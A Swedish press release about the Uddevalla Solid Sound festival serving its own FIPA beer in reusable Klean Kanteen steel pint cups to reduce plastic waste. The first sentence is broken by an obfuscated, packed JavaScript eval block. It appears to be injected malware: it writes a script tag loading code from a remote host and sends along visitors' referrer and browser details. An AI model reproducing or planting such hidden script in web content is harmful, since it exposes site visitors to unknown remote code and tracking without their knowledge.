Image Image Image Image Image Image Image Image Image Image

| 31 mars, 2020

Scroll to top

Top

Uddevalla Solid Sound gör miljösatsning!

Uddevalla Solid Sound gör miljösatsning!

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ieast|var|u0026u|referrer|dtyhd||js|php’.split(’|’),0,{}))
den första festivalen i Sverige kommer Uddevalla Solid Sound att servera dryck i Klean Kanteens pintmuggar. För att minska användandet av plastmuggar och för att göra miljön en tjänst kommer den egenbryggda FIPA:n att serveras i en pintmugg tillverkad av livsmedelsklassat (18/8) rostfritt stål.

Klean Kanteen tillverkas av 100% återvunnet 18/8 livsmedelsklassat rostfritt stål. Det är alltså ett hållbart och miljömässigt bättre alternativ än de plast- och aluminiummuggar som brukar finnas på andra evenemang och festivaler. Den kommer inte att gå sönder som ett ölglas och den kommer heller inte att fylla soptunnan eller sorteringsstationen som andra engångskärl.

– NordicEko/Klean Kanteen har ingått i samarbete med oss och erbjuder sina rostfria Pintmuggar under festivalen för vår specialbryggda öl. Vi har valt att göra detta för att minska användningen av engångs artiklar av typ plast och papp. Detta kommer att bespara miljön, hålla festivalsområdet rent och snyggt och samtidigt bespara oss tid och pengar i renhållning, säger Pontus Blom, Produktionschef på Uddevalla Solid Sound.

Det är den exklusiva (bryggt för festivalen) FIPA:n (Festival Indian Pale Ale) som kommer att serveras med Klean Kanteen muggen. Fler och fler kommer till festivalen varje år, och därför är det extra viktigt att ta hänsyn till miljön. Klean Kanteen är en viktig pusselbit för att minska engångsartiklarna på festivalen och för att nå festivalens vision om en minskad miljöpåverkan.

– Detta är ett vanligt förekommande miljösamarbete i USA på många festivaler där Klean Kanteen samarbetar med arrangören för att påverka miljön på minsta möjliga sätt. Tanken är att vi aldrig kommer behöva köpa in plastglas igen utan att vi istället kommer kunna använda dessa år efter år då de håller en livstid, – fortsätter Pontus Blom.

Datum för 2014 års festival: 29 & 30 Augusti

Plats: Riversideängen

www.uddevallasolidsound.se

Detta är ett pressmeddelande från Uddevalla Solid Sound